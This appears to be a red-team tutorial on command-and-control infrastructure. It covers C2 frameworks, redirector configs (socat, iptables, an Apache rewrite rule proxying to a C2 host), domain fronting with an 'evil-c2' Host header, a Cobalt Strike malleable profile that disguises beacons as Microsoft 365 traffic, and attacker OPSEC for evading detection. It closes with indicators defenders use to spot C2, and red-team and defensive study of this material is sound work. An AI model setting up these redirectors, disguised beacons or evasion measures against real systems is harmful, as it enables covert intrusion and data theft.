C2 Infrastructure: Command & Control
The C2 server is the attacker's command center. It receives beacons from compromised systems, issues commands, and collects exfiltrated data. Building resilient C2 infrastructure is what separates script kiddies from sophisticated operators.
What is Command & Control?
C2 (Command and Control) is the infrastructure attackers use to communicate with implants on compromised systems. Think of it as the attacker's remote management system.
┌─────────────────────────────────────────────────────────────────────────────┐ │ C2 ARCHITECTURE │ ├─────────────────────────────────────────────────────────────────────────────┤ │ │ │ COMPROMISED REDIRECTORS C2 SERVER │ │ TARGETS (Disposable) (Protected) │ │ │ │ ┌─────────┐ │ │ │ Target1 │────┐ ┌─────────────┐ │ │ └─────────┘ │ ┌─────────────┐ │ │ │ │ ├────────►│ Redirector1 │─────────►│ C2 │ │ │ ┌─────────┐ │ └─────────────┘ │ SERVER │ │ │ │ Target2 │────┤ │ │ │ │ └─────────┘ │ ┌─────────────┐ │ Cobalt │ │ │ ├────────►│ Redirector2 │─────────►│ Strike │ │ │ ┌─────────┐ │ └─────────────┘ │ Sliver │ │ │ │ Target3 │────┘ │ Havoc │ │ │ └─────────┘ │ │ │ │ └─────────────┘ │ │ │ │ Beacons go OUT ──────────────────────────────────────────► │ │ Commands come IN ◄────────────────────────────────────────── │ │ │ └─────────────────────────────────────────────────────────────────────────────┘
C2 Frameworks
Several frameworks exist for managing C2 operations. Each has trade-offs between features, detection, and operational security.
Cobalt Strike
The industry standard for professional red teams. Commercial license (~$5,900/year). Mature, feature-rich, extensive documentation. Also the most signatured by defenders.
Pros
- Extremely feature-rich
- Malleable C2 profiles
- Built-in pivoting
- Team collaboration
- Extensive documentation
Cons
- Expensive ($5,900/yr)
- Heavily signatured
- Cracked versions everywhere
- Defenders know it well
- Default configs = instant detection
Sliver
Open-source C2 from Bishop Fox. Modern Go-based implants, growing rapidly. Free, actively developed, increasingly capable.
Pros
- Free and open-source
- Modern architecture
- Cross-platform implants
- Built-in obfuscation
- Active development
Cons
- Less mature than CS
- Smaller community
- Getting signatured now
- Fewer evasion options
Havoc
Newer open-source C2 with a modern GUI. Designed to look and feel like Cobalt Strike but free. Growing community and rapid development.
Other Notable C2s
- Empire - PowerShell/Python agents, great for Windows
- Covenant - .NET based, good for evasion
- Mythic - Modular, multi-agent, Docker-based
- Brute Ratel - Commercial, designed to evade EDR
- Merlin - HTTP/2 based, stealthy
Redirectors: Protecting Your C2
Never expose your C2 server directly. Redirectors are disposable servers that forward traffic to your actual C2. If defenders block or investigate the redirector, your real infrastructure stays hidden.
# On redirector server - forward 443 to C2 socat TCP4-LISTEN:443,fork TCP4:c2-server.internal:443 # Or with iptables iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination C2_IP:443 iptables -t nat -A POSTROUTING -j MASQUERADE # Apache mod_rewrite for filtering RewriteEngine On RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5.0.*Windows NT 10" [NC] RewriteRule ^(.*)$ https://real-c2.com/$1 [P] RewriteRule ^(.*)$ https://legitimate-site.com/$1 [L,R=302]
Use cheap VPS providers (DigitalOcean, Linode, Vultr) for redirectors. Deploy in different geographic regions. Rotate frequently. If one gets burned, spin up a new one in minutes.
Domain Fronting & CDN Abuse
Domain fronting hides C2 traffic behind legitimate CDN domains. Your traffic appears to go to google.com or cloudfront.net while actually reaching your C2.
How It Works
- Implant connects to
allowed-cdn.cloudfront.net(allowed by firewall) - TLS SNI shows legitimate domain
- HTTP Host header contains your C2:
Host: evil-c2.cloudfront.net - CDN routes to your actual C2 backend
Note: Major CDNs (AWS, Google, Azure) have largely blocked this. Still works with some smaller CDNs and specific configurations.
Malleable C2 Profiles
Cobalt Strike's malleable profiles let you customize how beacon traffic looks. Make it look like legitimate traffic—Slack API calls, Microsoft 365, Google services.
# Make beacon look like Microsoft 365 traffic
http-get {
set uri "/api/v2.0/users/messages";
client {
header "Host" "outlook.office365.com";
header "Accept" "application/json";
header "Authorization" "Bearer eyJ...";
metadata {
base64url;
prepend "auth_token=";
header "Cookie";
}
}
server {
header "Content-Type" "application/json";
output {
base64url;
prepend "{\"value\":[{\"id\":\"";
append "\"}]}";
print;
}
}
}
Operational Security
Infrastructure OPSEC
- Never access C2 from personal IP
- Use VPN/Tor for management
- Separate long-haul vs short-haul C2
- Categorized domains (aged, categorized)
- Valid SSL certificates (Let's Encrypt)
- Geographic distribution
Traffic OPSEC
- Blend with normal traffic patterns
- Business hours beaconing
- Jitter on callbacks (30-50%)
- Use common ports (80, 443)
- Mimic legitimate user-agents
- Encrypted payloads
Short-haul C2: Interactive sessions, frequent callbacks, used during active operations.
More likely to be detected. Disposable.
Long-haul C2: Slow beacons (hours/days), persistent access, backup channel.
Stays dormant until needed. Harder to detect.
Detection: How Defenders Find C2
Network Indicators
- Beaconing patterns (regular intervals)
- JA3/JA3S TLS fingerprints
- Unusual DNS patterns
- High entropy in payloads
- Known-bad IPs/domains
- Certificate anomalies
Host Indicators
- Process injection artifacts
- Unusual parent-child processes
- Memory-only implants (no disk)
- Named pipes (Cobalt Strike default)
- Suspicious scheduled tasks
- Registry persistence